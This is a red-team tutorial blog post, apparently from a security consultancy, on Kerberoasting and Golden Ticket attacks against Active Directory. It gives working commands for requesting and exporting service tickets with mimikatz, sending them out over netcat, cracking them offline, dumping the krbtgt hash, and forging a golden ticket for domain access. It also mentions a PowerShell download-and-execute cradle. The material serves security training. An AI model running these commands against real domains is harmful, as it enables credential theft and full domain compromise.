Kerberosting and Golden Ticket For Red Teamers

Understanding the Basic of Kerberosting

Kerberoasting is one of the most common attacks against domain controllers. It is used to crack a Kerberos (encrypted password) hash using brute force techniques.

Where it allows users to -domain users, to request Kerberos tickets from TGS (ticket-granting service) which are encrypted with NTLM hash of plain password of a domain user which is used as a service account and crack them offline.

Before going for the Golden ticket exploit, let’s get an example for the Kerberosting

If you want, you can set up a windows machine and set it to the specific domain as it will ease the communication from external VM and base machine or what you can do is try any HTB windows machine and try your exploits thereafter gaining the user shell.
I would prefer the second one as I don’t have a heavy configuration.

Mainly What we do is crack the password offline as the part of TGS is used as a service and encrypted with the user’s password.
Note that only user accounts with the “servicePrincipalName” attribute set, are more likely to be exploited for kerberoasting.

So previously when I told you, you can use the machine in the HTB, don’t rely on them, most of the machines won’t have the SPN set, so I had set up a machine of my own with the spn set, downloading the windows server 12.

References

Search for the set SPN by commands.
You will have a eas on findings things and exploiting, download Powersploit tools.
Install all the Powerview recon folders in the system32 folder as it’s already set in the environment.
locate for Get-NetUsers, this will give info on the SPN set or not.

So basic enumeration, Get the domain information.

"Get-DomainComputer"

Now you got the domain information, collect the information on the SPN, drom the above command you can get the info for the domain.

Run ps> setspn -T dj.com -Q */*

Here you can see the user details where the SPN is set with the domain in the very last line.
We will request a service ticket for the service they wish to compromise. The domain controller will retrieve the permissions out of the Active Directory database and create a TGS ticket, encrypting it with the service’s password.

As a result, only the service and the domain controller are capable of decrypting the ticket since those are the only two entities that share the secret.
This requested ticket will get stored in the memory, which we will extract and crack.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/dc-mantvydas.offense.local"

We have to extract the Kerberos ticket from the memory and export it to a file for Kerberosting
For this we need mimikatz for windows exploitation, you can download mimikatz from the Github, download the latest zip
open a PowerShell session in the folder of mimikatz according to the mimikatz version of windows, mine is x64 so traverse to the specific folder and start the PowerShell session with the bellow command.

kerberos::list /export

This will dump out the files and then you can transfer it by just drag dropping or through NC or HTTP server, as you wish.

If we have the cracking tools in the windows then it’s all good, otherwise, copy the file “.kirbi” file to the kali as there are already tools available or can easily be installed
We copied the file in the kali.
Start an NC listener in kali and send the file from windows to kali.

nc -lvnp 6666
nc 192.168.182.129 6666<$pathtothemimikatzdump***.dj.com.kirbi

Cracking the Kerberos Hashes

After transferring the file, crack the kirbi file with the python tool, I prefer the python (“tgsrepcrack.py”) or there are tons of tools in the market, like –
Hashcat, John.

Use the command for cracking it, basically, the password cracking depends on the wordlist you use. I made a custom wordlist combining the wordlist which was already present.
this slowed the time a bit, usually when you don’t know it will take time.

python3 tgsrepcrack.py /usr/share/wordlists/wfuzz/general/common.txt  ../1-40a50000-dosha@HTTP~dj.com-DJ.COM.kirbi

If you don’t want the kirbi technique you can use the Invoke-Kerberoast module from the Empire tool where you can download from this command “iex (new-object Net.WebClient).DownloadString
you can use the Invoke-Kerberoast and dump the hash format for the key and then crack it using the Hashcat”

Golden Ticket

A golden ticket attack allows an attacker to create a Kerberos authentication ticket from a compromised service account, called krbtgt, with the help of Mimikatz.

This requires a user with an admin right purely authenticated as we have exploited the user above and gained access.
To perform this attack the user must be authenticated to perform any action, thus requesting a service or a ticket from the domain that will check if the user is authenticated or not.

Thus, by compromising the KRBTGT account the attack can create session tickets that already have the valid krbtgt hash.

This attack assumes a Domain Controller compromise where KRBTGT account hash will be extracted which is a requirement for a successful Golden Ticket attack.

Extracting the krbtgt account NTLM hash using mimikatz.
Already the mimikatz were installed, just use the below commands. we have to create a forged TGT and then extract the “domain name, SID, KRBTG Hash “.

mimikatz # privilege::debug

mimikatz # lasdump::lsa /inject /name:krbtgt ( you can provide different name)

Now using the mimikatz pass the forged ticket and gain the cmd. basically, we are pushing the forged TGT to KDC service to get TSG and that will for the time being will connect you to the session.

kerberos::golden /user:cursed /domain:DJ.COM /sid:S-1-5-21-1658281939-3107778392-223560393 /krbtgt:8b6da8753625a156ddda6272b9ce8cb4 /id:500 /ptt

misc::cmd

To confirm use the Klist command in the mimikatz, which will show the Client user which is just created by you.

After this, you can mount a c$ drive on the computer with the domain name you previously acquired , with the below command and you will gain access to the drive

 pushd \WIN-6E7EBF87UMR.dj.comc$
 ls

OR

you can use the before one where through misc::cmd opened a cmd which connects you with the domain controller, you can download the PsExec.exe for connecting to the network and gaining the shell access

psexec.exe \169.254.164.158 cmd.exe

This is a single type of attack there are many ways that you can have more knowledge of Kerberosting and exploiting golden ticket refer “https://www.hackingarticles.in/domain-persistence-golden-ticket-attack/“

References

• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting
• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
• https://www.hackingarticles.in/domain-persistence-golden-ticket-attack/
• https://adsecurity.org/?page_id=1821
• https://github.com/PowerShellEmpire/PowerTools
• https://book.hacktricks.xyz/windows/active-directory-methodology/kerberos-authentication
• https://github.com/davehardy20/sysinternals

About Payatu

Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries.